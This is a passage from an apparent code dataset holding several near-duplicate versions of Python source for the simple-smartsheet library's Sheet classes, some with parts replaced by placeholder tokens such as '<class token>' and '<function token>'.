provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass SheetSchema(CoreSchema):\n <docstring token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n <function token>\n\n\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n <docstring token>\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n <docstring token>\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n <function token>\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
